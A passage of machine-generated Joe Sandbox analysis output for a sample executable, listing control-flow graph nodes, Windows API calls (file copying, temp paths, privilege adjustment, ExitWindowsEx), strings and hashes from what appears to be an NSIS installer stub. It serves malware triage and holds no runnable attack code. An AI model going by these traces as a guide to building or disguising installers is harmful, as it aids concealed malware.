40162e 3814->3817 3815 4059fb CharNextW 3815->3825 3820 401423 25 API calls 3816->3820 3830 401423 3817->3830 3826 401653 3820->3826 3822 4056c5 2 API calls 3822->3825 3823 4056e2 5 API calls 3823->3825 3824 401642 SetCurrentDirectoryW 3824->3826 3825->3814 3825->3815 3825->3822 3825->3823 3827 4015f2 3825->3827 3828 40160f GetFileAttributesW 3825->3828 3827->3825 3829 405648 4 API calls 3827->3829 3828->3825 3829->3827 3831 405179 25 API calls 3830->3831 3832 401431 3831->3832 3833 40601a lstrcpynW 3832->3833 3833->3824 4618 40293b 4619 402ba2 18 API calls 4618->4619 4620 402941 4619->4620 4621 402964 4620->4621 4622 40297d 4620->4622 4628 40281e 4620->4628 4625 402969 4621->4625 4626 40297a 4621->4626 4623 402993 4622->4623 4624 402987 4622->4624 4629 40603c 18 API calls 4623->4629 4627 402ba2 18 API calls 4624->4627 4632 40601a lstrcpynW 4625->4632 4633 405f61 wsprintfW 4626->4633 4627->4628 4629->4628 4632->4628 4633->4628

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 40326a-40329d SetErrorMode GetVersion 1 4032b0 0->1 2 40329f-4032a7 call 4063f4 0->2 4 4032b5-4032c9 call 406384 lstrlenA 1->4 2->1 7 4032a9 2->7 9 4032cb-40333f call 4063f4 * 2 #17 OleInitialize SHGetFileInfoW call 40601a GetCommandLineW call 40601a GetModuleHandleW 4->9 7->1 18 403341-403348 9->18 19 403349-403363 call 4059fb CharNextW 9->19 18->19 22 403369-40336f 19->22 23 40347a-403494 GetTempPathW call 403239 19->23 25 403371-403376 22->25 26 403378-40337c 22->26 30 403496-4034b4 GetWindowsDirectoryW lstrcatW call 403239 23->30 31 4034ec-403506 DeleteFileW call 402dee 23->31 25->25 25->26 28 403383-403387 26->28 29 40337e-403382 26->29 32 403446-403453 call 4059fb 28->32 33 40338d-403393 28->33 29->28 30->31 48 4034b6-4034e6 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403239 30->48 51 4035b7-4035c7 ExitProcess CoUninitialize 31->51 52 40350c-403512 31->52 49 403455-403456 32->49 50 403457-40345d 32->50 37 403395-40339d 33->37 38 4033ae-4033e7 33->38 44 4033a4 37->44 45 40339f-4033a2 37->45 39 403404-40343e 38->39 40 4033e9-4033ee 38->40 39->32 47 403440-403444 39->47 40->39 46 4033f0-4033f8 40->46 44->38 45->38 45->44 55 4033fa-4033fd 46->55 56 4033ff 46->56 47->32 57 403465-403473 call 40601a 47->57 48->31 48->51 49->50 50->22 59 403463 50->59 53 4036ed-4036f3 51->53 54 4035cd-4035dd call 40575f ExitProcess 51->54 60 4035a7-4035ae call 403863 52->60 61 403518-403523 call 4059fb 52->61 63 403771-403779 53->63 64 4036f5-40370b GetCurrentProcess OpenProcessToken 53->64 55->39 55->56 56->39 66 403478 57->66 59->66 76 4035b3 60->76 78 403571-40357b 61->78 79 403525-40355a 61->79 70 40377b 63->70 71 40377f-403783 ExitProcess 63->71 73 403741-40374f call 4063f4 64->73 74 40370d-40373b LookupPrivilegeValueW AdjustTokenPrivileges 64->74 66->23 70->71 88 403751-40375b 73->88 89 40375d-403768 ExitWindowsEx 73->89 74->73 76->51 81 4035e3-4035f7 call 4056e2 lstrcatW 78->81 82 40357d-40358b call 405ad6 78->82 80 40355c-403560 79->80 84 403562-403567 80->84 85 403569-40356d 80->85 95 403604-40361e lstrcatW lstrcmpiW 81->95 96 4035f9-4035ff lstrcatW 81->96 82->51 97 40358d-4035a3 call 40601a * 2 82->97 84->85 90 40356f 84->90 85->80 85->90 88->89 93 40376a-40376c call 40140b 88->93 89->63 89->93 90->78 93->63 95->51 99 403620-403623 95->99 96->95 97->60 101 403625-40362a call 405648 99->101 102 40362c call 4056c5 99->102 109 403631-40363f SetCurrentDirectoryW 101->109 102->109 110 403641-403647 call 40601a 109->110 111 40364c-403675 call 40601a 109->111 110->111 115 40367a-403696 call 40603c DeleteFileW 111->115 118 4036d7-4036df 115->118 119 403698-4036a8 CopyFileW 115->119 118->115 120 4036e1-4036e8 call 405ebb 118->120 119->118 121 4036aa-4036ca call 405ebb call 40603c call 4056fa 119->121 120->51 121->118 130 4036cc-4036d3 CloseHandle 121->130 130->118
                                                  APIs
                                                  • SetErrorMode.KERNELBASE ref: 0040328D
                                                  • GetVersion.KERNEL32 ref: 00403293
                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004032BC
                                                  • #17.COMCTL32(00000007,00000009), ref: 004032DF
                                                  • OleInitialize.OLE32(00000000), ref: 004032E6
                                                  • SHGetFileInfoW.SHELL32(004206A8,00000000,?,000002B4,00000000), ref: 00403302
                                                  • GetCommandLineW.KERNEL32(00428200,NSIS Error), ref: 00403317
                                                  • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\x295IO8kqM.exe",00000000), ref: 0040332A
                                                  • CharNextW.USER32(00000000,"C:\Users\user\Desktop\x295IO8kqM.exe",00000020), ref: 00403351
                                                    • Part of subcall function 004063F4: GetModuleHandleA.KERNEL32(?,00000020,?,004032D3,00000009), ref: 00406406
                                                    • Part of subcall function 004063F4: GetProcAddress.KERNEL32(00000000,?), ref: 00406421
                                                  • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 0040348B
                                                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040349C
                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034A8
                                                  • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034BC
                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034C4
                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004034D5
                                                  • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004034DD
                                                  • DeleteFileW.KERNELBASE(1033), ref: 004034F1
                                                    • Part of subcall function 0040601A: lstrcpynW.KERNEL32(?,?,00000400,00403317,00428200,NSIS Error), ref: 00406027
                                                  • ExitProcess.KERNEL32(?), ref: 004035B7
                                                  • CoUninitialize.COMBASE(?), ref: 004035BC
                                                  • ExitProcess.KERNEL32 ref: 004035DD
                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\x295IO8kqM.exe",00000000,?), ref: 004035F0
                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040926C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\x295IO8kqM.exe",00000000,?), ref: 004035FF
                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\x295IO8kqM.exe",00000000,?), ref: 0040360A
                                                  • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\x295IO8kqM.exe",00000000,?), ref: 00403616
                                                  • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403632
                                                  • DeleteFileW.KERNEL32(0041FEA8,0041FEA8,?,0042A000,?), ref: 0040368C
                                                  • CopyFileW.KERNEL32(00437800,0041FEA8,00000001), ref: 004036A0
                                                  • CloseHandle.KERNEL32(00000000,0041FEA8,0041FEA8,?,0041FEA8,00000000), ref: 004036CD
                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 004036FC
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00403703
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403718
                                                  • AdjustTokenPrivileges.ADVAPI32 ref: 0040373B
                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403760
                                                  • ExitProcess.KERNEL32 ref: 00403783
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: Processlstrcat$ExitFile$Handle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                  • String ID: "C:\Users\user\Desktop\x295IO8kqM.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\woady\roadshow$C:\Users\user\AppData\Roaming\woady\roadshow$C:\Users\user\Desktop$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                  • API String ID: 354199918-4116917705
                                                  • Opcode ID: 2420fe7769d26c598cc17e9bd0fdec494bf06985fe1d6394dd0eae93972a8dec
                                                  • Instruction ID: 73295983c26b9bc795aacbdf710e3d5853a553e8a558082b103844ae68e0e3ab
                                                  • Opcode Fuzzy Hash: 2420fe7769d26c598cc17e9bd0fdec494bf06985fe1d6394dd0eae93972a8dec
                                                  • Instruction Fuzzy Hash: C3D1F470644200BBD720BF659D45A3B3AACEB8074AF10487EF541B62D2DB7D9D42CB6E

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 131 4052b8-4052d3 132 405462-405469 131->132 133 4052d9-4053a0 GetDlgItem * 3 call 404113 call 404a16 GetClientRect GetSystemMetrics SendMessageW * 2 131->133 135 405493-4054a0 132->135 136 40546b-40548d GetDlgItem CreateThread CloseHandle 132->136 155 4053a2-4053bc SendMessageW * 2 133->155 156 4053be-4053c1 133->156 138 4054a2-4054a8 135->138 139 4054be-4054c8 135->139 136->135 141 4054e3-4054ec call 404145 138->141 142 4054aa-4054b9 ShowWindow * 2 call 404113 138->142 143 4054ca-4054d0 139->143 144 40551e-405522 139->144 152 4054f1-4054f5 141->152 142->139 149 4054d2-4054de call 4040b7 143->149 150 4054f8-405508 ShowWindow 143->150 144->141 147 405524-40552a 144->147 147->141 157 40552c-40553f SendMessageW 147->157 149->141 153 405518-405519 call 4040b7 150->153 154 40550a-405513 call 405179 150->154 153->144 154->153 155->156 160 4053d1-4053e8 call 4040de 156->160 161 4053c3-4053cf SendMessageW 156->161 162 405641-405643 157->162 163 405545-405570 CreatePopupMenu call 40603c AppendMenuW 157->163 168 4053ea-4053fe ShowWindow 160->168 169 40541e-40543f GetDlgItem SendMessageW 160->169 161->160 162->152 170 405572-405582 GetWindowRect 163->170 171 405585-40559a TrackPopupMenu 163->171 172 405400-40540b ShowWindow 168->172 173 40540d 168->173 169->162 175 405445-40545d SendMessageW * 2 169->175 170->171 171->162 174 4055a0-4055b7 171->174 176 405413-405419 call 404113 172->176 173->176 177 4055bc-4055d7 SendMessageW 174->177 175->162 176->169 177->177 178 4055d9-4055fc OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 177->178 180 4055fe-405625 SendMessageW 178->180 180->180 181 405627-40563b GlobalUnlock SetClipboardData CloseClipboard 180->181 181->162
                                                  APIs
                                                  • GetDlgItem.USER32(?,00000403), ref: 00405316
                                                  • GetDlgItem.USER32(?,000003EE), ref: 00405325
                                                  • GetClientRect.USER32(?,?), ref: 00405362
                                                  • GetSystemMetrics.USER32(00000002), ref: 00405369
                                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 0040538A
                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040539B
                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053AE
                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053BC
                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053CF
                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004053F1
                                                  • ShowWindow.USER32(?,00000008), ref: 00405405
                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405426
                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405436
                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040544F
                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040545B
                                                  • GetDlgItem.USER32(?,000003F8), ref: 00405334
                                                    • Part of subcall function 00404113: SendMessageW.USER32(00000028,?,00000001,00403F3F), ref: 00404121
                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405478
                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_0000524C,00000000), ref: 00405486
                                                  • CloseHandle.KERNELBASE(00000000), ref: 0040548D
                                                  • ShowWindow.USER32(00000000), ref: 004054B1
                                                  • ShowWindow.USER32(?,00000008), ref: 004054B6
                                                  • ShowWindow.USER32(00000008), ref: 00405500
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405534
                                                  • CreatePopupMenu.USER32 ref: 00405545
                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405559
                                                  • GetWindowRect.USER32(?,?), ref: 00405579
                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405592
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055CA
                                                  • OpenClipboard.USER32(00000000), ref: 004055DA
                                                  • EmptyClipboard.USER32 ref: 004055E0
                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004055EC
                                                  • GlobalLock.KERNEL32(00000000), ref: 004055F6
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040560A
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0040562A
                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00405635
                                                  • CloseClipboard.USER32 ref: 0040563B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                  • String ID: {$&B
                                                  • API String ID: 590372296-2518801558
                                                  • Opcode ID: 13be7ae981530811380d0f761267b70b2e4bed12a68939208c9948e1057bf1d4
                                                  • Instruction ID: b072520f5ee80a331e4e918265d0c1a5052efaeab479527f9264255038cc5675
                                                  • Opcode Fuzzy Hash: 13be7ae981530811380d0f761267b70b2e4bed12a68939208c9948e1057bf1d4
                                                  • Instruction Fuzzy Hash: BDB13B71900208FFDB219F60DD89AAE7B79FB44355F10803AFA01B61A0C7755E92DF69

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 701 4066e2-4066e7 702 406758-406776 701->702 703 4066e9-406718 701->703 704 406d4e-406d63 702->704 705 40671a-40671d 703->705 706 40671f-406723 703->706 707 406d65-406d7b 704->707 708 406d7d-406d93 704->708 709 40672f-406732 705->709 710 406725-406729 706->710 711 40672b 706->711 714 406d96-406d9d 707->714 708->714 712 406750-406753 709->712 713 406734-40673d 709->713 710->709 711->709 717 406925-406943 712->717 715 406742-40674e 713->715 716 40673f 713->716 718 406dc4-406dd0 714->718 719 406d9f-406da3 714->719 723 4067b8-4067e6 715->723 716->715 724 406945-406959 717->724 725 40695b-40696d 717->725 728 406566-40656f 718->728 720 406f52-406f5c 719->720 721 406da9-406dc1 719->721 727 406f68-406f7b 720->727 721->718 729 406802-40681c 723->729 730 4067e8-406800 723->730 726 406970-40697a 724->726 725->726 731 40697c 726->731 732 40691d-406923 726->732 735 406f80-406f84 727->735 733 406575 728->733 734 406f7d 728->734 736 40681f-406829 729->736 730->736 737 4068f8-4068fc 731->737 738 406a8d-406a9a 731->738 732->717 743 4068c1-4068cb 732->743 739 406621-406625 733->739 740 406691-406695 733->740 741 40657c-406580 733->741 742 4066bc-4066dd 733->742 734->735 744 4067a0-4067a6 736->744 745 40682f 736->745 753 406902-40691a 737->753 754 406f04-406f0e 737->754 738->728 755 406ed1-406edb 739->755 756 40662b-406644 739->756 747 406ee0-406eea 740->747 748 40669b-4066af 740->748 741->727 746 406586-406593 741->746 742->704 749 406f10-406f1a 743->749 750 4068d1-4068f3 743->750 751 406859-40685f 744->751 752 4067ac-4067b2 744->752 762 406785-40679d 745->762 763 406eec-406ef6 745->763 746->734 760 406599-4065df 746->760 747->727 761 4066b2-4066ba 748->761 749->727 750->738 758 406861-40687f 751->758 759 4068bd 751->759 752->723 752->759 753->732 754->727 755->727 764 406647-40664b 756->764 766 406881-406895 758->766 767 406897-4068a9 758->767 759->743 768 4065e1-4065e5 760->768 769 406607-406609 760->769 761->740 761->742 762->744 763->727 764->739 765 40664d-406653 764->765 770 406655-40665c 765->770 771 40667d-40668f 765->771 772 4068ac-4068b6 766->772 767->772 773 4065f0-4065fe GlobalAlloc 768->773 774 4065e7-4065ea GlobalFree 768->774 775 406617-40661f 769->775 776 40660b-406615 769->776 777 406667-406677 GlobalAlloc 770->777 778 40665e-406661 GlobalFree 770->778 771->761 772->751 779 4068b8 772->779 773->734 780 406604 773->780 774->773 775->764 776->775 776->776 777->734 777->771 778->777 782 406ef8-406f02 779->782 783 40683e-406856 779->783 780->769 782->727 783->751
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0e2f680ccc61635b902b5d27a35f9f4c181eb1db892f7aa35b7a4bb0f1103339
                                                  • Instruction ID: 8bf6f29b28aad36262c5774fab9fc5fc8376212b20b0a75e389b428f0a59168b
                                                  • Opcode Fuzzy Hash: 0e2f680ccc61635b902b5d27a35f9f4c181eb1db892f7aa35b7a4bb0f1103339
                                                  • Instruction Fuzzy Hash: B5F16571D00229CBCF18CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A9ACF44
                                                  APIs
                                                  • FindFirstFileW.KERNELBASE(76CF3420,00425738,00424EF0,00405B1F,00424EF0,00424EF0,00000000,00424EF0,00424EF0,76CF3420,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,76CF3420,C:\Users\user\AppData\Local\Temp\), ref: 00406368
                                                  • FindClose.KERNEL32(00000000), ref: 00406374
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID: 8WB
                                                  • API String ID: 2295610775-3088156181
                                                  • Opcode ID: 4919aa1d8c56feb8b367bbb1b86ee1180edd575772c83518e79227edefbba0cf
                                                  • Instruction ID: 8488419dd32d28aa1913c95702376fed147eab6209e3de196541cdf70887181d
                                                  • Opcode Fuzzy Hash: 4919aa1d8c56feb8b367bbb1b86ee1180edd575772c83518e79227edefbba0cf
                                                  • Instruction Fuzzy Hash: BED01231949120ABC31417786D0C88B7A599F553317218E33F82AF53E0C3348C2586E9

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 182 403c06-403c18 183 403d59-403d68 182->183 184 403c1e-403c24 182->184 186 403db7-403dcc 183->186 187 403d6a-403db2 GetDlgItem * 2 call 4040de SetClassLongW call 40140b 183->187 184->183 185 403c2a-403c33 184->185 188 403c35-403c42 SetWindowPos 185->188 189 403c48-403c4b 185->189 191 403e0c-403e11 call 40412a 186->191 192 403dce-403dd1 186->192 187->186 188->189 194 403c65-403c6b 189->194 195 403c4d-403c5f ShowWindow 189->195 199 403e16-403e31 191->199 197 403dd3-403dde call 401389 192->197 198 403e04-403e06 192->198 200 403c87-403c8a 194->200 201 403c6d-403c82 DestroyWindow 194->201 195->194 197->198 219 403de0-403dff SendMessageW 197->219 198->191 204 4040ab 198->204 205 403e33-403e35 call 40140b 199->205 206 403e3a-403e40 199->206 210 403c8c-403c98 SetWindowLongW 200->210 211 403c9d-403ca3 200->211 208 404088-40408e 201->208 207 4040ad-4040b4 204->207 205->206 215 403e46-403e51 206->215 216 404069-404082 DestroyWindow KiUserCallbackDispatcher 206->216 208->204 213 404090-404096 208->213 210->207 217 403d46-403d54 call 404145 211->217 218 403ca9-403cba GetDlgItem 211->218 213->204 221 404098-4040a1 ShowWindow 213->221 215->216 222 403e57-403ea4 call 40603c call 4040de * 3 GetDlgItem 215->222 216->208 217->207 223 403cd9-403cdc 218->223 224 403cbc-403cd3 SendMessageW IsWindowEnabled 218->224 219->207 221->204 252 403ea6-403eab 222->252 253 403eae-403eea ShowWindow KiUserCallbackDispatcher call 404100 EnableWindow 222->253 227 403ce1-403ce4 223->227 228 403cde-403cdf 223->228 224->204 224->223 231 403cf2-403cf7 227->231 232 403ce6-403cec 227->232 230 403d0f-403d14 call 4040b7 228->230 230->217 233 403d2d-403d40 SendMessageW 231->233 235 403cf9-403cff 231->235 232->233 234 403cee-403cf0 232->234 233->217 234->230 238 403d01-403d07 call 40140b 235->238 239 403d16-403d1f call 40140b 235->239 248 403d0d 238->248 239->217 249 403d21-403d2b 239->249 248->230 249->248 252->253 256 403eec-403eed 253->256 257 403eef 253->257 258 403ef1-403f1f GetSystemMenu EnableMenuItem SendMessageW 256->258 257->258 259 403f21-403f32 SendMessageW 258->259 260 403f34 258->260 261 403f3a-403f78 call 404113 call 40601a lstrlenW call 40603c SetWindowTextW call 401389 259->261 260->261 261->199 270 403f7e-403f80 261->270 270->199 271 403f86-403f8a 270->271 272 403fa9-403fbd DestroyWindow 271->272 273 403f8c-403f92 271->273 272->208 275 403fc3-403ff0 CreateDialogParamW 272->275 273->204 274 403f98-403f9e 273->274 274->199 276 403fa4 274->276 275->208 277 403ff6-40404d call 4040de GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 275->277 276->204 277->204 282 40404f-404062 ShowWindow call 40412a 277->282 284 404067 282->284 284->208
                                                  APIs
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C42
                                                  • ShowWindow.USER32(?), ref: 00403C5F
                                                  • DestroyWindow.USER32 ref: 00403C73
                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403C8F
                                                  • GetDlgItem.USER32(?,?), ref: 00403CB0
                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CC4
                                                  • IsWindowEnabled.USER32(00000000), ref: 00403CCB
                                                  • GetDlgItem.USER32(?,00000001), ref: 00403D79
                                                  • GetDlgItem.USER32(?,00000002), ref: 00403D83
                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 00403D9D
                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403DEE
                                                  • GetDlgItem.USER32(?,00000003), ref: 00403E94
                                                  • ShowWindow.USER32(00000000,?), ref: 00403EB5
                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403EC7
                                                  • EnableWindow.USER32(?,?), ref: 00403EE2
                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403EF8
                                                  • EnableMenuItem.USER32(00000000), ref: 00403EFF
                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F17
                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F2A
                                                  • lstrlenW.KERNEL32(004226E8,?,004226E8,00428200), ref: 00403F53
                                                  • SetWindowTextW.USER32(?,004226E8), ref: 00403F67
                                                  • ShowWindow.USER32(?,0000000A), ref: 0040409B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
